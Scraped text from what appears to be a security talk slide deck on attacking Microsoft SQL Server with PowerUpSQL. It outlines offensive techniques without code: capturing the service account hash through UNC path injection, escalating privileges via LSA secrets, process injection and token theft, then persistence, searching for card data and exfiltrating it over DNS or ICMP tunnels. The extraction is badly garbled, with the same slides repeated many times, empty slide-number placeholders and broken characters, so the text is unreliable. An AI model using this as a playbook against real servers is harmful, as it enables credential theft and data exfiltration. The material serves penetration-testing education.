Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)